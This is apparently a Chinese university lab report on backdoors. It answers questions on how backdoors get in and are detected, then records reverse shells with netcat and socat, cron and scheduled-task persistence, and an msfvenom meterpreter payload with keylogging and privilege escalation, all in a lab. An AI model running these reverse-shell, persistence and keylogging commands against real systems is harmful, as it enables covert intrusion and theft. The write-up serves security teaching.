20145312 《网络对抗》 后门原理与实践

20145312 《网络对抗》 后门原理与实践

基础问题回答

1.例举你能想到的一个后门进入到你系统中的可能方式？

• 在所谓软件之家的网站下载应用软件时，安装过程中附带的可能就有后门程序。
• 垃圾邮件中的链接点开后可能就安装了后门程序。

2.例举你知道的后门如何启动起来(win及linux)的方式？

• windows：通过启动任务计划程序、开机自启动的后门、和其他程序捆绑运行的后门程序，修改注册表。
• linux：通过在cron启动、通过和其他程序捆绑运行后门程序。

3.Meterpreter有哪些给你映像深刻的功能？

• 可以启动目标主机摄像头，可以监听键盘，可以录制音频.，可以提权......

4.如何发现自己有系统有没有被安装后门？

• 一般后门程序常见的杀毒软件就可以查杀，win10自带的Windows Defender也有同样作用。
• 可以下载一些比较专业的监视软件进行监听检测。
• 检查防火墙开启的端口和它对应的进程，如果不是系统默认开启的端口都有嫌疑，找到对应的进程，对其进行抓包分析。

实验内容和步骤

1. ncat的使用

使用nc传输数据

• 本实验中我在VMWare中实现Linux和Windows主机间的互联
  
  

Windows获得Linux的Shell

• 在Kali环境下，反向连接Windows主机的5312端口：
  

• Windows下成功获得了一个Kali的shell，运行ls指令如下：
  

Linux获得Windows Shell

• 在Windows下，反向连接Kali主机的5312端口：
  

• 在虚拟机中获得了windows的shell之后我输入了ipconfig，成功查看到了windows本机的ip地址信息
  

cron的启动

• 这里首先在linux中输入crontab -e指令，通过编辑增加一条定时任务，我输入的是08 * * * * /bin/netcat 10.1.1. 165 5312 -e /bin/sh意味着在每个小时的08分，如果有一台ip地址为10.1.1.165 通过端口5312的主机监听着linux，就会得到一个shell
  

2. socat获取主机操作Shell

• 在Windows系统下，打开控制面板->管理工具->任务计划程序，创建任务名为：20145312，触发器为：当锁定任何用户的工作站时。在操作->程序或脚本中选择我的socat.exe文件的路径，在添加参数一栏填写tcp-listen:5312 exec:cmd.exe,pty,stderr
  

• 创建完成之后，锁定计算机再次打开时，可以发现之前创建的任务已经开始运行：
  

• 此时，在Kali环境下输入指令socat - tcp:10.1.1.165:5312，此时可以发现已经成功获得了一个cmd shell：
  

3. meterpreter的使用

使用meterpreter监听靶机

• 输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.212 LPORT=5312 -f exe > 20145312_backdoor.exe 后，并将生成的后门程序传送到Windows主机上后，在Kali上使用msfconsole指令进入msf控制台，使用监听模块，设置payload，设置反弹回连的IP和端口：
  

• 设置完成后，执行监听，打开Windows上的后门程序，此时Kali上已经获得了Windows主机的连接，并且得到了远程控制的shell：
  

使用meterpreter对靶机进行键盘监听和提权

• 使用keyscan_start指令开始记录下击键的过程，使用keyscan_dump指令读取击键的记录：
  
  

• 使用getuid指令查看当前用户，使用getsystem指令进行提权
  

实验总结与体会

• 本次“后门原理与实践”实验，让我意识到任何电脑系统都不是绝对安全的。尤其是做meterpreter实践时，不仅监听了键盘输入还获得了提权，意味着我不仅能够窃取用户信息还可以在靶机上为所欲为了。这警示了我要养成即使补丁防火墙漏洞，定时杀毒等习惯。